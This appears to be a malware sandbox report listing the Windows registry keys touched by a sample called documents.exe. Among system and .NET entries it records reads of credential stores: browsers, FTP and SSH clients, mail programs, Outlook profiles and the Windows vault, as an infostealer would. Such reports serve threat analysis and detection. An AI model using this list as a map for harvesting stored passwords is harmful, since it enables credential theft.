HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.5.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Core,3.5.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1a160f57\2f8d0787
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|documents.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|documents.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|documents.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1a160f57\60438131
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\documents.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\E115DF6A
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari
HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon
HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock
HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox86
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Pale Moon
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Waterfox
HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
HKEY_CURRENT_USER\Software\Ghisler\Total Commander
HKEY_CURRENT_USER\Software
HKEY_CURRENT_USER\Software\Adobe
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\JavaSoft
HKEY_CURRENT_USER\Software\Macromedia
HKEY_CURRENT_USER\Software\Microsoft
HKEY_CURRENT_USER\Software\Netscape
HKEY_CURRENT_USER\Software\ODBC
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Bitvise\BvSshClient
HKEY_CURRENT_USER\Software\VanDyke\SecureFX
HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts
HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
HKEY_CURRENT_USER\Software\IncrediMail\Identities
HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail
HKEY_CURRENT_USER\Software\WinChips\UserAccounts
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd1\x9c\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x92\xef\xbf\xbd\xef\xbf\xbd\xd0\x99\xef\xbf\xbd\xef\xbf\xbd\xd1\x8f\xef\xbf\xbd\xef\xbf\xbd
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index28
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
